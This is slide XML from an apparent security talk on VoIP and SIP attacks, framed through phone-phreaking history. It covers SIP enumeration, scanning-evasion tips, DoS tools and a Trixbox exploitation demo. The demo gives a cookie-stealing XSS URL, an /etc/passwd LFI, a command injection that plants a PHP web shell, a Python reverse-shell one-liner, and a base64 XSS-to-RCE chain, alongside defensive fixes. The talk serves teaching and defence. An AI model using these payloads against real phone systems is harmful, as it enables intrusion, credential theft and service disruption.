            <a:ext cx="4858449" cy="26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Information Leakage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72458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Google searches, DNS queries, job boards, and calls that go to voicemail or auto-attendant may  the type of phone system in use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VoIP signaling (SIP) can give away information about your environment.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If Internet connected, a quick SIP OPTIONS or INVITE  reveals key info. User-Agent, Server, X- headers, or other header presence (or lack of) tells me what you’re running.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A quick vuln database scan tells me how to try to compromise your system.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Samples from SHODANHQ</a:t>
            </a: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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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Sagem / HW_V0.0.1 / FW_V58903C-58C040 / SW_V1.2.344</a:t>
            </a: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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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BT Home Hub 2.0A Build 8.1.H.U, X-Serialnumber: CP1039JH8FJ </a:t>
            </a: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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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Server: Avaya CM/R013x.01.3.640.2 </a:t>
            </a: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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en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Server: Asterisk PBX 1.6.1.11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-3175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User or extension enumeration - quick SIP REGISTER or INVITE scan - error codes indicates existence of extensions - to enable cracking later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475" y="1853600"/>
            <a:ext cx="1465775" cy="2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SIP &amp; SDP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INVITE sip:19195551212@skynet.net SIP/2.0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Via: SIP/2.0/UDP 10.1.3.3:5060;branch=z9hG4bKb27061747269636b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From: “JConnor“ &lt;sip:15554141337@10.1.3.3:5060&gt;;tag=18de4db33f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To: "19195551212" &lt;sip:19195551212@skynet.net&gt;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Call-ID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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19424e0d9187654209ed34db33f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CSeq: 1 INVITE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Max-Forwards: 70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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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BigTelcoVendor/R16.4.1.1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Supported: 100rel,timer,replaces,join,histinfo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Allow: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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INVITE,CANCEL,BYE,ACK,NOTIFY,REFER,OPTIONS,INFO,PUBLISH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Contact: “JConnor" &lt;sip:15554141337@10.1.3.3:5060;transport=udp&gt;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application/sdp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165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v=0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o=- 1 1 IN IP4 10.1.3.3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s=-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c=IN IP4 10.1.3.3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b=AS:64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t=0 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m=audio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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19001</a:t>
            </a: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RTP/AVP 0 127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a=rtpmap:0 PCMU/8000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a=rtpmap:127 telephone-event/8000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sz="11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SIP REGISTER response example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7354800" cy="3591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SIP/2.0 401 Unauthorized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Via: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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K-2287643575;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received=192.168.139.129;rport=5060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From: "1000" &lt;sip:1000@192.168.139.147&gt;;tag=3808669587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To: "1000" &lt;sip:1000@192.168.139.147&gt;;tag=as7e811da0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Call-ID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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1949270127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CSeq: 1 REGISTER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Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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FPBX-2.11.0(11.14.1)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Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH, MESSAGE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Supported: replaces, timer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WWW-Authenticate: Digest algorithm=MD5, realm="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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asterisk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", nonce="1a8c3feb"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Content-Length: 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="140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/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="10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Dark Ages Crypto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70482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REGISTER sip:192.168.1.130 SIP/2.0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Via: SIP/2.0/UDP 192.168.1.1:8166;branch=z9hG4bK-d8754z-0be76a4b680f6408-1---d8754z-;rport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Max-Forwards: 70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Contact: &lt;sip:1000@192.168.1.1:8166;rinstance=c7c558226c47c266&gt;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To: &lt;sip:1000@192.168.1.130&gt;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From: &lt;sip:1000@192.168.1.130&gt;;tag=309f3210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Call-ID: YWM4NWQxNThiNGEwMjhmYTJhZmIwYzJiNjMxNTY1MjE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CSeq: 2 REGISTER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Expires: 3600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Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO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User-Agent: X-Lite 4.7.1 74247-647f3e8e-W6.1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Authorization: Digest username="1000",realm="asterisk",nonce="35e47ee9",uri="sip:192.168.1.130",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response="33ac377e4d50ad6026837ef37b2d33ce",algorithm=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="24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MD5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Content-Length: 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="120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475" y="1930300"/>
            <a:ext cx="1823927" cy="18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SIP VoIP info gathering tips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If using nmap for port scans, specify both TCP and UDP, along with a port range to detect Asterisk AMI (5038) since it’s outside of the nmap default ports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Make sure to specify -O and -sV nmap options for fingerprinting &amp; versioning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Scan slow. Many detection systems and filters are rate based. (-T)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If using SIPVicious change the default User-Agent in svhelper.py (useragent=)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Consider using another SIP method such as INVITE or CANCEL for enumeration instead of OPTIONS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Metasploit SIP scanner randomizes identifying fields to foil signatures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Information Leakage Demo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See SIPVicious video on GitHub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Compares old Asterisk vs new Asterisk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Shows our iptables rules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Information Leakage Defense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Change the default SIP “User-Agent” string to fool attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-3302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In asterisk change sip_general_additional.conf “useragent=”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-3302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Or in FreePBX Web GUI &gt; Settings &gt; Asterisk SIP Settings &gt; Go to “Other SIP settings” at bottom and enter “useragent” and “&lt;value you want&gt;”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Block known bad user agents and perform rate limiting to prevent scans and credential cracking. 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Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> for iptables rules to do this!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Add “alwaysauthreject=yes” to sip_custom.conf &amp; username &lt;&gt; extension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Implement fail2ban to block IPs that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-3302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Try to register to invalid extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-3302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Have a number of registration failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-3302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Exceed a reasonable message rate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" sz="1800"/>
              <a:t>Use a security appliance that will block SIP scans - SBC, SIP specific detection system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> 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7501" y="3674"/>
            <a:ext cx="1196498" cy="119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Denial of Service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598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2000" b="1"/>
              <a:t>What:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> DoS attacks aim to overload and make a service unavailable, typically a high-profile target. DoS attacks are often perpetrated as a way to protest a perceived wrong, a source of amusement, or occasionally by criminals as a form of extortion.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2000"/>
              <a:t>When multiple sources are used the attack is a Distributed DoS (DDoS)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0" y="1244950"/>
            <a:ext cx="3431375" cy="26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-965050"/>
            <a:ext cx="9206167" cy="6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Denial of Service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b="1"/>
              <a:t>Phreaks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Causing a failure or doing anything to draw attention to phreaking was against the ethos of the community.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However, there was debate over whether it was possible to “stack tandems” and tie up long distance trunks by bouncing a call around between two switches.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9313325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Denial of Service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b="1"/>
              <a:t>Now:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> Internet connected phone systems attacked using automated tools. Usually larger companies are targeted.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IP DDoS easy with a cheap botnet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Telephony DoS was a subject of Patrick’s previous talk on phone fraud. Phone line tied up for extortion or social engineering purposes.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808" y="1381125"/>
            <a:ext cx="4101041" cy="23812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First: A brief word from our lawyer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249450" y="1063375"/>
            <a:ext cx="5255100" cy="3742799"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 65083"/>
              <a:gd name="adj2" fmla="val -12653"/>
              <a:gd name="adj3" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F3F3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810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Views and opinions are from Patrick &amp; Owen and not those of any past or present employer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-3810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presentation is solely for academic and educational purposes. Don’t be a &lt;expletive&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-3810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Service Marks, Trademarks, and Copyrights belong to their respective owners.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Denial of Service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03375" y="1200150"/>
            <a:ext cx="56862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UDP or TCP flooding / full-open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Just like any other DDoS attack - flood the SIP port to tie up sockets or eat bandwidth. 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hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> great for traffic generation, but not evasion. HOIC, LOIC, etc are similar.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TLS renegotiation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Connect, then ask for new handshake to change session characteristics repeatedly. Huge crypto load on server, little work for client. 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thc-ssl-dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> is the de-facto standard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Initial &amp; in-process method floods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Send SIP methods that tie up sessions. TCP INVITE best attack to hog TCP &amp; SIP resources. Out of state ACK or OK responses more difficult to block by non-proxy devices. See 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inviteflood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>on Kali or our scripts on Github.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575" y="2090850"/>
            <a:ext cx="2996400" cy="21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Denial of Service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879400" cy="38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RTP Flooding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Flood UDP to keep valid calls from being established. Most effective against handsets. Look at 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rtpflood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>on BT5. BUT, really? Need MITM, bunch of info, and only good for stopping audio.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Call teardown attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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Send a SIP BYE message to disconnect the call. Possible, but not likely unless you get MITM to get call-ids and other info. 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scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> or proxy to craft your weapon as needed.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Fuzzing / process crashing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Sending invalid information in place of protocol fields to find a crash. Good for one-shot, one-kill attacks, but best with offline research. (protos, Codenomicon($), VoIPER, Interstate)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375" y="2233124"/>
            <a:ext cx="2650950" cy="178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Denial of Service Demo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See DoS video on GitHub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Shows effects on CPU when simultaneous SIP INVITE flood and highly fragmented UDP flood launch together.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Denial of Service Defense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52016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BCP 38 / RFC2827 at edge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Hey, did we mention fail2ban?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iptables rules to block based on known bad user agents, SIP method rates or non-SIP traffic to SIP port.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UDP / TCP floods can still consume BW w/o upstream DoS ‘scrubbing’ based on volume AND behavior or kill kernel performance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Most B2BUAs / SBCs and some other border security devices can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totally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fsck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> with RTP attacks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mitigate SSL renegotiation attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="9144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do message format inspection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501" y="3674"/>
            <a:ext cx="1196498" cy="119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824" y="1717200"/>
            <a:ext cx="3117099" cy="224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Exploitation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74364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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No description needed - right?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endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="40404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404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex·ploi·ta·tion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04040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (ĕk′sploi-tā′shən)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="14625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i="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="14625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404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The act of employing to the greatest possible advantage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="14625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404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utilization of another person or group for selfish purposes</a:t>
            </a:r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Exploitation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phreaks used the weaknesses in the phone network to their greatest advantage, and used them to enable further exploration.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Exploitation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07775" y="1190900"/>
            <a:ext cx="83993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Nowadays. used for…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Pretty much anything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TrixBox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Immensely popular Asterisk front end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SourceForge Stats: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006699"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>5.0 Stars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (35)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555555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Last Update: 2013-06-18</a:t>
            </a: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http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/stats/json?start_date=2010-01-01&amp;end_date=2015-01-01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (More Stats)</a:t>
            </a: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555555"/>
              </a:solidFill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400" y="1973525"/>
            <a:ext cx="60198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Vulnerabilities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457200" y="4204600"/>
            <a:ext cx="8229600" cy="7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http://www.cvedetails.com/vendor/6284/Asterisk.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> - Memory Coruption, XSS, Directory Traversal,  HTTP Response Splitting, CSRF and File Inclusion not included in chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="302" name="Shape 302"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1143475" y="1368175"/>
          <a:ext cx="6857025" cy="2732532"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{7B40BAD1-7915-4CBD-A011-317F684670B8}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="642650"/>
                <a:gridCol w="660750"/>
                <a:gridCol w="642650"/>
                <a:gridCol w="651675"/>
                <a:gridCol w="651675"/>
                <a:gridCol w="660750"/>
                <a:gridCol w="651675"/>
                <a:gridCol w="651675"/>
                <a:gridCol w="660750"/>
                <a:gridCol w="982775"/>
              </a:tblGrid>
              <a:tr h="40005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Year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DoS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Code Execution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Overflow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Sql Injection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Bypass something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Gain Information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Gain Privileges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# of exploits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# of Vulnerabilities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</a:tr>
              <a:tr h="2705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 u="sng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4"/>
                        </a:rPr>
                        <a:t>2007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5"/>
                        </a:rPr>
                        <a:t>11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6"/>
                        </a:rPr>
                        <a:t>3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7"/>
                        </a:rPr>
                        <a:t>3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8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9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10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11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17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5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 u="sng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12"/>
                        </a:rPr>
                        <a:t>2008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13"/>
                        </a:rPr>
                        <a:t>8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14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15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16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17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15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5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 u="sng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18"/>
                        </a:rPr>
                        <a:t>2009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19"/>
                        </a:rPr>
                        <a:t>2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20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21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3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5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 u="sng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22"/>
                        </a:rPr>
                        <a:t>2010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23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5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 u="sng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24"/>
                        </a:rPr>
                        <a:t>2011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25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5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 u="sng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26"/>
                        </a:rPr>
                        <a:t>2012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27"/>
                        </a:rPr>
                        <a:t>4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28"/>
                        </a:rPr>
                        <a:t>2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29"/>
                        </a:rPr>
                        <a:t>2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6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5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 u="sng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30"/>
                        </a:rPr>
                        <a:t>2013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1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2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3"/>
                        </a:rPr>
                        <a:t>2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4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3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Total</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="952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5"/>
                        </a:rPr>
                        <a:t>28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6"/>
                        </a:rPr>
                        <a:t>7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7"/>
                        </a:rPr>
                        <a:t>9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8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9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40"/>
                        </a:rPr>
                        <a:t>4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41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42"/>
                        </a:rPr>
                        <a:t>1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46</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28575" marR="28575" marT="28575" marB="28575">
                    <a:lnL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Exploitation Demo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457200" y="4585925"/>
            <a:ext cx="8229600" cy="33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http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> - By AttackTerrorist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525125" y="1160650"/>
            <a:ext cx="4199999" cy="342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/>
              <a:t>Unauthenticated XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/user/help/html/index.php?id_nodo=%22onmouseover%3dalert%28%27wow_1337\n%27%2bdocument.cookie%29%3d%22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 b="1"/>
              <a:t>Translation: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?id_nodo=“onmouseover=alert(‘wow_1337\n’+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document.cookie)=”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400" y="1340987"/>
            <a:ext cx="4138750" cy="32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Why are we doing this?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243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Before personal computers, BBS, and the Internet, the original electronics hackers were the phone phreaks. They are our legacy, and you should know something about it.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The types of things they found are still around today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VoIP like the first phone network wasn’t designed for security in it’s first iteration, proving ...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subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358650" y="4060325"/>
            <a:ext cx="84267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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What Goes Around Comes Back Around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Exploitation Demo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457200" y="4662125"/>
            <a:ext cx="8229600" cy="33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http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> - By AttackTerrorist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525125" y="1160650"/>
            <a:ext cx="3768000" cy="342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Local File Inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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/maint/modules/home/index.php?lang=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../../../../etc/passwd%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1"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Other interesting files to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Other than your normal goto files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1"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Asterisk Configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (/etc/asterisk/)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users.conf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voicemail.conf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extensions.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Many More</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Amp Portal Config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/etc/amportal.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Asterisk Logs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/var/log/asterisk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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8000" y="1204824"/>
            <a:ext cx="4583925" cy="33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Exploitation Demo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457200" y="4400950"/>
            <a:ext cx="8229600" cy="55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http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> - By AttackTerrorist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525125" y="1160650"/>
            <a:ext cx="8229600" cy="324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 sz="1800" b="1"/>
              <a:t>Authenticated Remote Code Execution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Goal: Upload Shell.php, Spawn Netcat Shell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rgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/maint/modules/home/index.php?lang=1;echo "&lt;?php system(\$_GET['cmd']);?&gt;"&gt;shell.php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/maint/modules/home/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%22192.168.1.10%22,1234%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/bash%22,%22-i%22]%29;%27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(VIDEO)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Exploitation Demo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457200" y="4572000"/>
            <a:ext cx="8229600" cy="57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http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> - LFI &amp; XSS By AttackTerrorist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>SIP Message Injection By Snide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543125" y="1295650"/>
            <a:ext cx="8229600" cy="26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But Wait, There is more!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Authenticated LFI to Remote Code via Sip Injection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(VIDEO)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Exploitation Demo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457200" y="4572000"/>
            <a:ext cx="8229600" cy="57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http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> - LFI &amp; XSS By AttackTerrorist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543125" y="1295650"/>
            <a:ext cx="8229600" cy="363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Putting it all Together.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From XSS (UNAUTH)-&gt;RCE (AUTH)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Requires info gathering (maybe)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Possibly phishing, hidden frames.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 b="1"/>
              <a:t>DO WAT NOW?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user/help/html/index.php?id_nodo=%22onmouseover%3dwindow.location.replace%28window.atob%28%27aHR0cDovLzE5Mi4xNjguMS41MC9tYWludC9tb2R1bGVzL2hvbWUvaW5kZXgucGhwP2xhbmc9TUY7ZWNobyAiPD9waHAgc3lzdGVtKFwkX0dFVFtcImNtZFwiXSk7Pz4iPnNoZWxsNi5waHA=%27%29%29;%22"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0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200"/>
              <a:t>Load Page with iFrame src above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0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200"/>
              <a:t>Use the XSS to trigger onmouseover (in frame) to load Base64 Encoded URL: http://192.168.1.50/maint/modules/home/index.php?lang=MF;echo "&lt;?php system(\$_GET['cmd']);?&gt;"&gt;../../../shell6.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0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200"/>
              <a:t>Hide Frame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Exploitation Defense</a:t>
            </a:r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25725" y="1074750"/>
            <a:ext cx="5511899" cy="412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Fix for XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>help/html/index.php:44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400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$smarty-&gt;assign("id_nodo",$_GET['id_nodo']);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Fix for LFI - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>/var/www/html/maint/modules/home/index.php:68-72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$tbLang = $_GET['lang'];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$languageFile = 'language/'.$tbLang.'.php';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if(file_exists($languageFile)){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200" dirty="0"/>
              <a:t>include($languageFile);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Fix for RCE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>/var/www/html/maint/modules/home/index.php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68: $tbLang = $_GET['lang'];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339: $phpOutput = shell_exec('php -q libs/status.php '.$tbLang);//exec('perl libs/status.pl');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501" y="3674"/>
            <a:ext cx="1196498" cy="119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052" y="1623526"/>
            <a:ext cx="3475947" cy="25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Exploitation Defense</a:t>
            </a:r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325725" y="1074750"/>
            <a:ext cx="5511899" cy="412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Fix for XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>help/html/index.php:44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400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$smarty-&gt;assign("id_nodo",$_GET['id_nodo']);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if (in_array($tbLang, array(‘home’,’meetme’,’etc’’))  {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$smarty-&gt;assign("id_nodo",$_GET['id_nodo']);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Fix for LFI - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>/var/www/html/maint/modules/home/index.php:68-72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$tbLang = $_GET['lang'];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if (!in_array($tbLang, array(‘home’,’meetme’,’etc’’))  { $tbLang=“english”;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$languageFile = 'language/'.$tbLang.'.php';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if(file_exists($languageFile)){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200" dirty="0"/>
              <a:t>include($languageFile);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Fix for RCE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>/var/www/html/maint/modules/home/index.php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68: $tbLang = $_GET['lang'];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339: $phpOutput = shell_exec('php -q libs/status.php '.$tbLang);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:effectLst>
                  <a:glow rad="101600">
                    <a:srgbClr val="7030A0">
                      <a:alpha val="60000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>//exec('perl libs/status.pl');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if (!in_array($tbLang, array(‘english’,’french’,’etc’))  { $tbLang=“english”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean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}`</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:effectLst>
                <a:glow rad="101600">
                  <a:srgbClr val="FFFF00">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:glow>
              </a:effectLst>
            </a:endParaRP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501" y="3674"/>
